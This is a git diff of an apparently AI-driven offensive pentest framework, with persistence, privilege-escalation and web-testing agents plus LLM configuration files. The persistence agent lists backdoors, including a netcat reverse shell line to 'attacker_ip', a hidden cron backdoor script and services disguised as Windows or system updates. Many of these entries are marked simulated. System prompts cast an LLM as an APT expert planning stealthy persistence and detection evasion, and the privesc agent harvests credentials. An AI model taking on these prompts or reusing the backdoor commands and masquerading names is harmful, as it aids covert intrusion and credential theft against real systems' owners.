logger.info("Phase 1: AI persistence strategy")
|
||||||
|
strategy = self._ai_persistence_strategy(context)
|
||||||
|
results["ai_recommendations"] = strategy
|
||||||
|
|
||||||
|
# Phase 2: Establish Persistence Mechanisms
|
||||||
|
logger.info("Phase 2: Establishing persistence mechanisms")
|
||||||
|
|
||||||
|
system_info = privesc_data.get("system_info", {})
|
||||||
|
os_type = system_info.get("os", "unknown")
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
results["persistence_mechanisms"].extend(
|
||||||
|
self._establish_linux_persistence()
|
||||||
|
)
|
||||||
|
elif os_type == "windows":
|
||||||
|
results["persistence_mechanisms"].extend(
|
||||||
|
self._establish_windows_persistence()
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase 3: Install Backdoors
|
||||||
|
logger.info("Phase 3: Installing backdoors")
|
||||||
|
results["backdoors_installed"] = self._install_backdoors(os_type)
|
||||||
|
|
||||||
|
# Phase 4: Create Scheduled Tasks
|
||||||
|
logger.info("Phase 4: Creating scheduled tasks")
|
||||||
|
results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Persistence phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during persistence: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _ai_persistence_strategy(self, context: Dict) -> Dict:
|
||||||
|
"""Use AI to plan persistence strategy"""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"persistence",
|
||||||
|
"ai_persistence_strategy_user",
|
||||||
|
default=f"""
|
||||||
|
Plan a comprehensive persistence strategy based on the following context:
|
||||||
|
|
||||||
|
{json.dumps(context, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Recommended persistence techniques (prioritized)
|
||||||
|
2. Stealth considerations
|
||||||
|
3. Resilience against system reboots
|
||||||
|
4. Evasion of detection mechanisms
|
||||||
|
5. Multiple fallback mechanisms
|
||||||
|
6. Cleanup and removal procedures
|
||||||
|
|
||||||
|
Response in JSON format with detailed implementation plan.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"persistence",
|
||||||
|
"ai_persistence_strategy_system",
|
||||||
|
default="""You are an expert in persistence techniques and advanced persistent threats.
|
||||||
|
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
|
||||||
|
Consider both Windows and Linux environments.
|
||||||
|
Prioritize operational security and longevity."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI persistence strategy error: {e}")
|
||||||
|
return {"error": str(e)}
|
||||||
|
|
||||||
|
def _establish_linux_persistence(self) -> List[Dict]:
|
||||||
|
"""Establish Linux persistence mechanisms"""
|
||||||
|
mechanisms = []
|
||||||
|
|
||||||
|
# Cron job
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "cron_job",
|
||||||
|
"description": "Scheduled task for persistence",
|
||||||
|
"command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# SSH key
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "ssh_key",
|
||||||
|
"description": "Authorized keys persistence",
|
||||||
|
"location": "~/.ssh/authorized_keys",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Systemd service
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "systemd_service",
|
||||||
|
"description": "Persistent system service",
|
||||||
|
"service_name": "system-update.service",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# bashrc modification
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "bashrc",
|
||||||
|
"description": "Shell initialization persistence",
|
||||||
|
"location": "~/.bashrc",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return mechanisms
|
||||||
|
|
||||||
|
def _establish_windows_persistence(self) -> List[Dict]:
|
||||||
|
"""Establish Windows persistence mechanisms"""
|
||||||
|
mechanisms = []
|
||||||
|
|
||||||
|
# Registry Run key
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "registry_run",
|
||||||
|
"description": "Registry autorun persistence",
|
||||||
|
"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Scheduled task
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "scheduled_task",
|
||||||
|
"description": "Windows scheduled task",
|
||||||
|
"task_name": "WindowsUpdate",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# WMI event subscription
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "wmi_event",
|
||||||
|
"description": "WMI persistence",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Service installation
|
||||||
|
mechanisms.append({
|
||||||
|
"type": "service",
|
||||||
|
"description": "Windows service persistence",
|
||||||
|
"service_name": "WindowsSecurityUpdate",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return mechanisms
|
||||||
|
|
||||||
|
def _install_backdoors(self, os_type: str) -> List[Dict]:
|
||||||
|
"""Install backdoors"""
|
||||||
|
backdoors = []
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
backdoors.extend([
|
||||||
|
{
|
||||||
|
"type": "reverse_shell",
|
||||||
|
"description": "Netcat reverse shell",
|
||||||
|
"command": "nc -e /bin/bash attacker_ip 4444",
|
||||||
|
"status": "simulated"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "ssh_backdoor",
|
||||||
|
"description": "SSH backdoor on alternate port",
|
||||||
|
"port": 2222,
|
||||||
|
"status": "simulated"
|
||||||
|
}
|
||||||
|
])
|
||||||
|
elif os_type == "windows":
|
||||||
|
backdoors.extend([
|
||||||
|
{
|
||||||
|
"type": "powershell_backdoor",
|
||||||
|
"description": "PowerShell reverse shell",
|
||||||
|
"status": "simulated"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "meterpreter",
|
||||||
|
"description": "Meterpreter payload",
|
||||||
|
"status": "simulated"
|
||||||
|
}
|
||||||
|
])
|
||||||
|
|
||||||
|
return backdoors
|
||||||
|
|
||||||
|
def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
|
||||||
|
"""Create scheduled tasks"""
|
||||||
|
tasks = []
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
tasks.append({
|
||||||
|
"type": "cron",
|
||||||
|
"schedule": "*/10 * * * *",
|
||||||
|
"command": "Callback beacon every 10 minutes",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
elif os_type == "windows":
|
||||||
|
tasks.append({
|
||||||
|
"type": "scheduled_task",
|
||||||
|
"schedule": "Daily at 2 AM",
|
||||||
|
"command": "Callback beacon",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return tasks
|
||||||
305
agents/privesc_agent.py
Normal file
305
agents/privesc_agent.py
Normal file
@@ -0,0 +1,305 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Privilege Escalation Agent - System privilege elevation
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
from tools.privesc import (
|
||||||
|
LinuxPrivEsc,
|
||||||
|
WindowsPrivEsc,
|
||||||
|
KernelExploiter,
|
||||||
|
MisconfigFinder,
|
||||||
|
CredentialHarvester,
|
||||||
|
SudoExploiter
|
||||||
|
)
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class PrivEscAgent:
|
||||||
|
"""Agent responsible for privilege escalation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize privilege escalation agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.linux_privesc = LinuxPrivEsc(config)
|
||||||
|
self.windows_privesc = WindowsPrivEsc(config)
|
||||||
|
self.kernel_exploiter = KernelExploiter(config)
|
||||||
|
self.misconfig_finder = MisconfigFinder(config)
|
||||||
|
self.cred_harvester = CredentialHarvester(config)
|
||||||
|
self.sudo_exploiter = SudoExploiter(config)
|
||||||
|
|
||||||
|
logger.info("PrivEscAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute privilege escalation phase"""
|
||||||
|
logger.info(f"Starting privilege escalation on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"escalation_paths": [],
|
||||||
|
"successful_escalations": [],
|
||||||
|
"credentials_harvested": [],
|
||||||
|
"system_info": {},
|
||||||
|
"ai_analysis": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get exploitation data from context
|
||||||
|
exploit_data = context.get("phases", {}).get("exploitation", {})
|
||||||
|
|
||||||
|
if not exploit_data.get("successful_exploits"):
|
||||||
|
logger.warning("No successful exploits found. Limited privilege escalation options.")
|
||||||
|
results["status"] = "skipped"
|
||||||
|
results["message"] = "No initial access obtained"
|
||||||
|
return results
|
||||||
|
|
||||||
|
# Phase 1: System Enumeration
|
||||||
|
logger.info("Phase 1: System enumeration")
|
||||||
|
results["system_info"] = self._enumerate_system(exploit_data)
|
||||||
|
|
||||||
|
# Phase 2: Identify Escalation Paths
|
||||||
|
logger.info("Phase 2: Identifying escalation paths")
|
||||||
|
results["escalation_paths"] = self._identify_escalation_paths(
|
||||||
|
results["system_info"]
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase 3: AI-Powered Path Selection
|
||||||
|
logger.info("Phase 3: AI escalation strategy")
|
||||||
|
strategy = self._ai_escalation_strategy(
|
||||||
|
results["system_info"],
|
||||||
|
results["escalation_paths"]
|
||||||
|
)
|
||||||
|
results["ai_analysis"] = strategy
|
||||||
|
|
||||||
|
# Phase 4: Execute Escalation Attempts
|
||||||
|
logger.info("Phase 4: Executing escalation attempts")
|
||||||
|
for path in results["escalation_paths"][:5]:
|
||||||
|
escalation_result = self._attempt_escalation(path, results["system_info"])
|
||||||
|
|
||||||
|
if escalation_result.get("success"):
|
||||||
|
results["successful_escalations"].append(escalation_result)
|
||||||
|
logger.info(f"Successful escalation: {path.get('technique')}")
|
||||||
|
break # Stop after first successful escalation
|
||||||
|
|
||||||
|
# Phase 5: Credential Harvesting
|
||||||
|
if results["successful_escalations"]:
|
||||||
|
logger.info("Phase 5: Harvesting credentials")
|
||||||
|
results["credentials_harvested"] = self._harvest_credentials(
|
||||||
|
results["system_info"]
|
||||||
|
)
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Privilege escalation phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during privilege escalation: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _enumerate_system(self, exploit_data: Dict) -> Dict:
|
||||||
|
"""Enumerate system for privilege escalation opportunities"""
|
||||||
|
system_info = {
|
||||||
|
"os": "unknown",
|
||||||
|
"kernel_version": "unknown",
|
||||||
|
"architecture": "unknown",
|
||||||
|
"users": [],
|
||||||
|
"groups": [],
|
||||||
|
"sudo_permissions": [],
|
||||||
|
"suid_binaries": [],
|
||||||
|
"writable_paths": [],
|
||||||
|
"scheduled_tasks": [],
|
||||||
|
"services": [],
|
||||||
|
"environment_variables": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Determine OS type from exploit data
|
||||||
|
os_type = self._detect_os_type(exploit_data)
|
||||||
|
system_info["os"] = os_type
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
system_info.update(self.linux_privesc.enumerate())
|
||||||
|
elif os_type == "windows":
|
||||||
|
system_info.update(self.windows_privesc.enumerate())
|
||||||
|
|
||||||
|
return system_info
|
||||||
|
|
||||||
|
def _detect_os_type(self, exploit_data: Dict) -> str:
|
||||||
|
"""Detect operating system type"""
|
||||||
|
# Placeholder - would analyze exploit data to determine OS
|
||||||
|
return "linux" # Default assumption
|
||||||
|
|
||||||
|
def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
|
||||||
|
"""Identify possible privilege escalation paths"""
|
||||||
|
paths = []
|
||||||
|
os_type = system_info.get("os")
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
# SUID exploitation
|
||||||
|
for binary in system_info.get("suid_binaries", []):
|
||||||
|
paths.append({
|
||||||
|
"technique": "suid_exploitation",
|
||||||
|
"target": binary,
|
||||||
|
"difficulty": "medium",
|
||||||
|
"likelihood": 0.6
|
||||||
|
})
|
||||||
|
|
||||||
|
# Sudo exploitation
|
||||||
|
for permission in system_info.get("sudo_permissions", []):
|
||||||
|
paths.append({
|
||||||
|
"technique": "sudo_exploitation",
|
||||||
|
"target": permission,
|
||||||
|
"difficulty": "low",
|
||||||
|
"likelihood": 0.8
|
||||||
|
})
|
||||||
|
|
||||||
|
# Kernel exploitation
|
||||||
|
if system_info.get("kernel_version"):
|
||||||
|
paths.append({
|
||||||
|
"technique": "kernel_exploit",
|
||||||
|
"target": system_info["kernel_version"],
|
||||||
|
"difficulty": "high",
|
||||||
|
"likelihood": 0.4
|
||||||
|
})
|
||||||
|
|
||||||
|
# Writable path exploitation
|
||||||
|
for path in system_info.get("writable_paths", []):
|
||||||
|
if "bin" in path or "sbin" in path:
|
||||||
|
paths.append({
|
||||||
|
"technique": "path_hijacking",
|
||||||
|
"target": path,
|
||||||
|
"difficulty": "medium",
|
||||||
|
"likelihood": 0.5
|
||||||
|
})
|
||||||
|
|
||||||
|
elif os_type == "windows":
|
||||||
|
# Service exploitation
|
||||||
|
for service in system_info.get("services", []):
|
||||||
|
if service.get("unquoted_path") or service.get("weak_permissions"):
|
||||||
|
paths.append({
|
||||||
|
"technique": "service_exploitation",
|
||||||
|
"target": service,
|
||||||
|
"difficulty": "medium",
|
||||||
|
"likelihood": 0.7
|
||||||
|
})
|
||||||
|
|
||||||
|
# AlwaysInstallElevated
|
||||||
|
if system_info.get("always_install_elevated"):
|
||||||
|
paths.append({
|
||||||
|
"technique": "always_install_elevated",
|
||||||
|
"target": "MSI",
|
||||||
|
"difficulty": "low",
|
||||||
|
"likelihood": 0.9
|
||||||
|
})
|
||||||
|
|
||||||
|
# Token impersonation
|
||||||
|
paths.append({
|
||||||
|
"technique": "token_impersonation",
|
||||||
|
"target": "SeImpersonatePrivilege",
|
||||||
|
"difficulty": "medium",
|
||||||
|
"likelihood": 0.6
|
||||||
|
})
|
||||||
|
|
||||||
|
# Sort by likelihood
|
||||||
|
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
|
||||||
|
return paths
|
||||||
|
|
||||||
|
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
|
||||||
|
"""Use AI to optimize escalation strategy"""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"privesc",
|
||||||
|
"ai_escalation_strategy_user",
|
||||||
|
default=f"""
|
||||||
|
Analyze the system and recommend optimal privilege escalation strategy:
|
||||||
|
|
||||||
|
System Information:
|
||||||
|
{json.dumps(system_info, indent=2)}
|
||||||
|
|
||||||
|
Identified Escalation Paths:
|
||||||
|
{json.dumps(escalation_paths, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Recommended escalation path (with justification)
|
||||||
|
2. Step-by-step execution plan
|
||||||
|
3. Required tools and commands
|
||||||
|
4. Detection likelihood and evasion techniques
|
||||||
|
5. Fallback options
|
||||||
|
6. Post-escalation actions
|
||||||
|
|
||||||
|
Response in JSON format with actionable recommendations.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"privesc",
|
||||||
|
"ai_escalation_strategy_system",
|
||||||
|
default="""You are an expert in privilege escalation techniques.
|
||||||
|
Analyze systems and recommend the most effective, stealthy escalation paths.
|
||||||
|
Consider Windows, Linux, and Active Directory environments.
|
||||||
|
Prioritize reliability and minimal detection."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
formatted_prompt = prompt.format(
|
||||||
|
system_info_json=json.dumps(system_info, indent=2),
|
||||||
|
escalation_paths_json=json.dumps(escalation_paths, indent=2)
|
||||||
|
)
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI escalation strategy error: {e}")
|
||||||
|
return {"error": str(e)}
|
||||||
|
|
||||||
|
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
|
||||||
|
"""Attempt privilege escalation using specified path"""
|
||||||
|
technique = path.get("technique")
|
||||||
|
os_type = system_info.get("os")
|
||||||
|
|
||||||
|
result = {
|
||||||
|
"technique": technique,
|
||||||
|
"success": False,
|
||||||
|
"details": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
if os_type == "linux":
|
||||||
|
if technique == "suid_exploitation":
|
||||||
|
result = self.linux_privesc.exploit_suid(path.get("target"))
|
||||||
|
elif technique == "sudo_exploitation":
|
||||||
|
result = self.sudo_exploiter.exploit(path.get("target"))
|
||||||
|
elif technique == "kernel_exploit":
|
||||||
|
result = self.kernel_exploiter.exploit_linux(path.get("target"))
|
||||||
|
elif technique == "path_hijacking":
|
||||||
|
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
|
||||||
|
|
||||||
|
elif os_type == "windows":
|
||||||
|
if technique == "service_exploitation":
|
||||||
|
result = self.windows_privesc.exploit_service(path.get("target"))
|
||||||
|
elif technique == "always_install_elevated":
|
||||||
|
result = self.windows_privesc.exploit_msi()
|
||||||
|
elif technique == "token_impersonation":
|
||||||
|
result = self.windows_privesc.impersonate_token()
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Escalation error for {technique}: {e}")
|
||||||
|
result["error"] = str(e)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
|
||||||
|
"""Harvest credentials after privilege escalation"""
|
||||||
|
os_type = system_info.get("os")
|
||||||
|
|
||||||
|
if os_type == "linux":
|
||||||
|
return self.cred_harvester.harvest_linux()
|
||||||
|
elif os_type == "windows":
|
||||||
|
return self.cred_harvester.harvest_windows()
|
||||||
|
|
||||||
|
return []
|
||||||
120
agents/web_pentest_agent.py
Normal file
120
agents/web_pentest_agent.py
Normal file
@@ -0,0 +1,120 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Web Pentest Agent - Specialized agent for web application penetration testing.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class WebPentestAgent:
|
||||||
|
"""Agent responsible for comprehensive web application penetration testing."""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initializes the WebPentestAgent."""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.web_recon = WebRecon(config)
|
||||||
|
# Placeholder for web exploitation tools if they become separate classes
|
||||||
|
# self.web_exploiter = WebExploiter(config)
|
||||||
|
logger.info("WebPentestAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Executes the web application penetration testing phase."""
|
||||||
|
logger.info(f"Starting web pentest on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"web_recon_results": {},
|
||||||
|
"vulnerability_analysis": [],
|
||||||
|
"exploitation_attempts": [],
|
||||||
|
"ai_analysis": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Phase 1: Web Reconnaissance
|
||||||
|
logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
|
||||||
|
web_recon_output = self.web_recon.analyze(target)
|
||||||
|
results["web_recon_results"] = web_recon_output
|
||||||
|
|
||||||
|
# Phase 2: Vulnerability Analysis (AI-powered)
|
||||||
|
logger.info("Phase 2: AI-powered Vulnerability Analysis")
|
||||||
|
# This part will be improved later with more detailed vulnerability detection in WebRecon
|
||||||
|
# For now, it will look for findings reported by WebRecon
|
||||||
|
|
||||||
|
potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)
|
||||||
|
|
||||||
|
if potential_vulnerabilities:
|
||||||
|
results["vulnerability_analysis"] = potential_vulnerabilities
|
||||||
|
ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
|
||||||
|
results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
|
||||||
|
else:
|
||||||
|
logger.info("No immediate web vulnerabilities identified by WebRecon.")
|
||||||
|
|
||||||
|
# Phase 3: Web Exploitation (Placeholder for now)
|
||||||
|
# This will integrate with exploitation tools later.
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Web pentest phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during web pentest: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
|
||||||
|
"""
|
||||||
|
Identifies potential web vulnerabilities based on WebRecon output.
|
||||||
|
This is a placeholder and will be enhanced as WebRecon improves.
|
||||||
|
"""
|
||||||
|
vulnerabilities = []
|
||||||
|
if "vulnerabilities" in web_recon_output:
|
||||||
|
vulnerabilities.extend(web_recon_output["vulnerabilities"])
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
|
||||||
|
"""Uses AI to analyze identified web vulnerabilities."""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"web_recon",
|
||||||
|
"ai_analysis_user",
|
||||||
|
default=f"""
|
||||||
|
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
|
||||||
|
|
||||||
|
Vulnerabilities: {json.dumps(vulnerabilities, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Prioritized list of vulnerabilities
|
||||||
|
2. Recommended exploitation steps for each (if applicable)
|
||||||
|
3. Potential impact
|
||||||
|
4. Remediation suggestions
|
||||||
|
|
||||||
|
Response in JSON format with actionable recommendations.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"web_recon",
|
||||||
|
"ai_analysis_system",
|
||||||
|
default="""You are an expert web penetration tester and security analyst.
|
||||||
|
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Format the user prompt with recon_data
|
||||||
|
formatted_prompt = prompt.format(
|
||||||
|
target=target,
|
||||||
|
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
|
||||||
|
)
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI web vulnerability analysis error: {e}")
|
||||||
|
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
|
||||||
|
|
||||||
50
config/config-example.json
Normal file
50
config/config-example.json
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
{
|
||||||
|
"llm": {
|
||||||
|
"provider": "gemini",
|
||||||
|
"model": "gemini-pro",
|
||||||
|
"api_key": "",
|
||||||
|
"temperature": 0.7,
|
||||||
|
"max_tokens": 4096
|
||||||
|
},
|
||||||
|
"agents": {
|
||||||
|
"recon": {
|
||||||
|
"enabled": true,
|
||||||
|
"priority": 1
|
||||||
|
},
|
||||||
|
"exploitation": {
|
||||||
|
"enabled": true,
|
||||||
|
"priority": 2
|
||||||
|
},
|
||||||
|
"privilege_escalation": {
|
||||||
|
"enabled": true,
|
||||||
|
"priority": 3
|
||||||
|
},
|
||||||
|
"persistence": {
|
||||||
|
"enabled": true,
|
||||||
|
"priority": 4
|
||||||
|
},
|
||||||
|
"lateral_movement": {
|
||||||
|
"enabled": true,
|
||||||
|
"priority": 5
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"methodologies": {
|
||||||
|
"owasp_top10": true,
|
||||||
|
"cwe_top25": true,
|
||||||
|
"network_pentest": true,
|
||||||
|
"ad_pentest": true,
|
||||||
|
"web_security": true
|
||||||
|
},
|
||||||
|
"tools": {
|
||||||
|
"nmap": "/usr/bin/nmap",
|
||||||
|
"metasploit": "/usr/bin/msfconsole",
|
||||||
|
"burpsuite": "/usr/bin/burpsuite",
|
||||||
|
"sqlmap": "/usr/bin/sqlmap",
|
||||||
|
"hydra": "/usr/bin/hydra"
|
||||||
|
},
|
||||||
|
"output": {
|
||||||
|
"format": "json",
|
||||||
|
"verbose": true,
|
||||||
|
"save_artifacts": true
|
||||||
|
}
|
||||||
|
}
|
||||||
140
config/config.json
Normal file
140
config/config.json
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
{
|
||||||
|
"llm": {
|
||||||
|
"default_profile": "gemini_pro_default",
|
||||||
|
"profiles": {
|
||||||
|
"ollama_llama3_default": {
|
||||||
|
"provider": "ollama",
|
||||||
|
"model": "llama3:8b",
|
||||||
|
"api_key": "",
|
||||||
|
"temperature": 0.7,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"input_token_limit": 8000,
|
||||||
|
"output_token_limit": 4000,
|
||||||
|
"cache_enabled": true,
|
||||||
|
"search_context_level": "medium",
|
||||||
|
"pdf_support_enabled": false,
|
||||||
|
"guardrails_enabled": true,
|
||||||
|
"hallucination_mitigation_strategy": "grounding"
|
||||||
|
},
|
||||||
|
"claude_opus_default": {
|
||||||
|
"provider": "claude",
|
||||||
|
"model": "claude-3-opus-20240229",
|
||||||
|
"api_key": "${ANTHROPIC_API_KEY}",
|
||||||
|
"temperature": 0.3,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"input_token_limit": 200000,
|
||||||
|
"output_token_limit": 4000,
|
||||||
|
"cache_enabled": true,
|
||||||
|
"search_context_level": "high",
|
||||||
|
"pdf_support_enabled": true,
|
||||||
|
"guardrails_enabled": true,
|
||||||
|
"hallucination_mitigation_strategy": "self_reflection"
|
||||||
|
},
|
||||||
|
"gemini_pro_default": {
|
||||||
|
"provider": "gemini",
|
||||||
|
"model": "gemini-pro",
|
||||||
|
"api_key": "${GEMINI_API_KEY}",
|
||||||
|
"temperature": 0.7,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"input_token_limit": 30720,
|
||||||
|
"output_token_limit": 2048,
|
||||||
|
"cache_enabled": true,
|
||||||
|
"search_context_level": "medium",
|
||||||
|
"pdf_support_enabled": true,
|
||||||
|
"guardrails_enabled": true,
|
||||||
|
"hallucination_mitigation_strategy": "consistency_check"
|
||||||
|
},
|
||||||
|
"gpt_4o_default": {
|
||||||
|
"provider": "gpt",
|
||||||
|
"model": "gpt-4o",
|
||||||
|
"api_key": "${OPENAI_API_KEY}",
|
||||||
|
"temperature": 0.5,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"input_token_limit": 128000,
|
||||||
|
"output_token_limit": 4000,
|
||||||
|
"cache_enabled": true,
|
||||||
|
"search_context_level": "high",
|
||||||
|
"pdf_support_enabled": true,
|
||||||
|
"guardrails_enabled": true,
|
||||||
|
"hallucination_mitigation_strategy": "grounding"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"agent_roles": {
|
||||||
|
"bug_bounty_hunter": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"],
|
||||||
|
"description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
|
||||||
|
},
|
||||||
|
"blue_team_agent": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "claude_opus_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Analyzes logs and telemetry for threats, provides defensive strategies."
|
||||||
|
},
|
||||||
|
"exploit_expert": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gpt_4o_default",
|
||||||
|
"tools_allowed": ["metasploit", "nmap"],
|
||||||
|
"description": "Devises exploitation strategies and payloads for identified vulnerabilities."
|
||||||
|
},
|
||||||
|
"red_team_agent": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["nmap", "metasploit", "hydra"],
|
||||||
|
"description": "Plans and executes simulated attacks to test an organization's defenses."
|
||||||
|
},
|
||||||
|
"replay_attack_specialist": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "ollama_llama3_default",
